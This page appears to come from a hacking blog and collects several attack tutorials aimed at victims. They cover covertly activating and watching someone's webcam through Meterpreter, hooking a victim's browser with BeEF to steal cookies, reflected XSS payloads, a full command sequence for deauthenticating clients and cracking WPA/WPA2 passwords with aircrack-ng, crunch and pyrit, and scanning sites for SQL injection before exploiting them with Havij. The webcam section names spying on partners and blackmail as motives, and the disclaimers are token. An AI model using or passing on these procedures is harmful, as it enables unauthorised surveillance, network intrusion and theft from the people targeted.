How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely

———————————————————————————————
How to Secretly Hack Into, Switch On, & Watch Anyone's Webcam Remotely
———————————————————————————————

Welcome back ,

Like in my last article on remotely installing a keylogger onto somebody's computer, this guide will continue to display the abilities of Metasploit's powerful Meterpreter by hacking into the victim's webcam. This will allow us to control the webcam remotely, capturing snapshots from it.

Pic : http://bit.ly/Yrfb0G

Why exactly would you want to hack into somebody's webcam? Maybe you suspect your significant other of having a fling. Or, maybe you're into blackmailing. Or, maybe you're just a creep. But the real purpose is to show just how easy it is, so you're aware that it can be done—and so you can protect yourself against it.

Pic : http://bit.ly/XQsdF5


Unlike just installing a command shell on the victim computer, the Meterpreter has the power to do numerous and nearly unlimited things on the target's computer. The key is to get the Meterpreter installed on their system first.

Pic : http://bit.ly/Zx6icF

So, now let’s fire up Metasploit and install Meterpreter on the victim's system. Once we have done that, we can then begin to view and capture images from their webcam.

Step 1: List the Victim's Webcams

Metasploit's Meterpreter has a built-in module for controlling the remote system's webcam. The first thing we need to do is to check if there is a web cam, and if there is, get its name. We can do that by typing :

meterpreter > webcam_list

If he/she has a webcam, the system will come back with a list of all the webcams.

Step 2: Snap Pictures from the Victim's Webcam

Now that we know he/she has a webcam, we can take a snapshot from the webcam by typing :

meterpreter > webcam_snap

The system will now save a snapshot from her webcam onto our system in the directory /opt/framework3/msf3, which we can open and see what's going on.

Pic : http://bit.ly/15AMmGq

The quality of the image saved all depends on your victim's webcam and surroundings.

Step 3: Watch Streaming Video from the Victim's Webcam

Now that we know how to capture a single snapshot from the victim's webcam, we will now want to run the webcam so that we can watch a continuous video stream. We can do this by typing :

meterpreter > run webcam -p /var/www

This command starts his/her webcam and sends its streaming output to /var/www/webcam.htm.

How to Protect Yourself from Webcam Intrusion :

So, what can you do to make sure no one is peeking in on your habits in front of the computer? The easiest solution—cover your webcam up. Some laptops with built-in webcams actually have a slide cover you can use.

Pic : http://bit.ly/Wf27Ml

If that's not the case, a piece of non-translucent tape should to the trick, unless you want to buy one of these or these things. And if you still have one of those old-school USB webcams, simply unplug it.

We will continue to explore fun ways we can use the Meterpreter in the near future, so make sure to come back for more!

Read More

Hacking a Web-browser with beef

Browser Exploration Framework is mainly used to exploit a Web-browser.When i was trying it I play a varied types of pranks with victim browser like making open a pop-up window,playing a sound,stealing cookie etc. So lets start hacking.
Follow all the steps according to my post ======>


1. First install beef by clicking on Applications->Backtrack–>Exploitation Tools->Social Engineering Tools->BEEF XSS Framework->BeEF Installer.


2. Now when beef installs open beef by going to same directory like in 1st step then click on beef and beef will start connecting.

3. Now copy the open the url written in front of hook url like in image.

4. After opening the link u will see a login page just put username beef and password beef to login.


5. Now a window will open showing you beef control panel,now the main exploration will start.


6. Now send this link  http://127.0.0.1:3000/demos/basic.html to victim.

7. Once victim will open you will be connected to his computer through his browser and you will see connected browsers at top left bottom under the Online browser tab like in image.


8. Click on any online browser in online browser tab and you will get a page with a full information of browser.

9. Then click on Commands tab to start open various exploits and tools.


10. Now use any of commands to making pranks with the victim.


Note;---> its for educational purpose only.
While doing all this don't close the terminal that will open as opening of beef.

Read More

Non Persistent Xss Attack

The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net.

It's commonly named as "non-persistent" because it works on an immediate HTTP response from the

 victim website: it show up when the webpage get the data provided by the attacker's client to

automatically generate a result page for the attackers himself. Standing on this the attacker could

provide some malicious code and try to make the server execute it in order to obtain some result.

The most common applying of this kind of vulnerability is in Search engines in website: the attacker

writes some arbitrary HTML code in the search textbox and, if the website 


is vulnerable, the result page will return the result of these HTML entities.

Simply put, cross site scripting involves the injection of malicious code into a website. It is the most
  
common method of attack at the moment, as most large sites will contain at least one XSS

vulnerability. However, there is more than one type of XSS. The most commonly found is referred to

as "non persistent" XSS. 

None Persistent XSS

Non persistent as the title suggests means that the injected script isn't permanent and just appears for

 the short time the user is viewing the page. The best example of this is a basic coded search engine

for a site. Say for example, the site search script is in this format:

Site.com/search.php?search=text here 

Once something has been searched for, the script may display on the page something along the lines

of:

"Results for text here"

Simply echoing your search string straight onto the page without performing any validation checks.

What if we were to alter the search string to display html of JavaScript? For example:

Site.com/search.php?search=<font color=red>XSS</font> 

Site.com/search.php?search=<script>alert("XSS");</script>

If no sanitation checks are being performed by the search script, this will just be echoed straight onto

the page, therefore displaying an alert or red text. If there was no limit to the size, this could be used

 to display anything you want. 

However, since the attacker can only display code on their own pages, this isn't much of a threat to

other users. Although if the string was turned into Hex the search string may be slightly more hidden

and with a little deception could be used to trick users into thinking the link is legitimate. 

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Read More

How to hack WPA / WPA2 password

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]

Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
 -w is the file to be written
--bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs
Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w - 
*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
-c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install
Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0

Open another terminal.

aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse, you will be solely responsible for any misuse that you do. Hacking email accounts is criminal activity and is punishable under cyber crime and you may get upto 40 years of imprisonment, if got caught in doing so.

Read More

Facebook Fan Pages Attack

This summary is not available. Please click here to view the post.

Read More

SQLSentinel:SQL Injection Vulnerability Scanner

Hey friends this is D@rk TruTH. Sorry for posting very late i was busy in my studies because my exams are coming.
Today I am bringing a new SQL injection hunter tool named SQLSentinel.

What is SQLSentinel -->

This tool is very good if u want to test a site vulnerable to SQL injection.

This tool use crawling function first found out links like index.php?id= and then check that these links are vulnerable or not.

It only found out vulnerabilities, but not hack it.

Usage of tool --->

1. First download it from here

2. Open .zip file and click on sqlsentinel.jar and it will open but make sure you have installed java.

3. After opening it add website url in Url box and click Start.

4. If it found some vulnerabilities then it will show you in Working logs text box like i get some in image given below.

5. Use Havij or any other SQL injection tool to hack website.

Note:-->

Only for educational purpose. 

Read More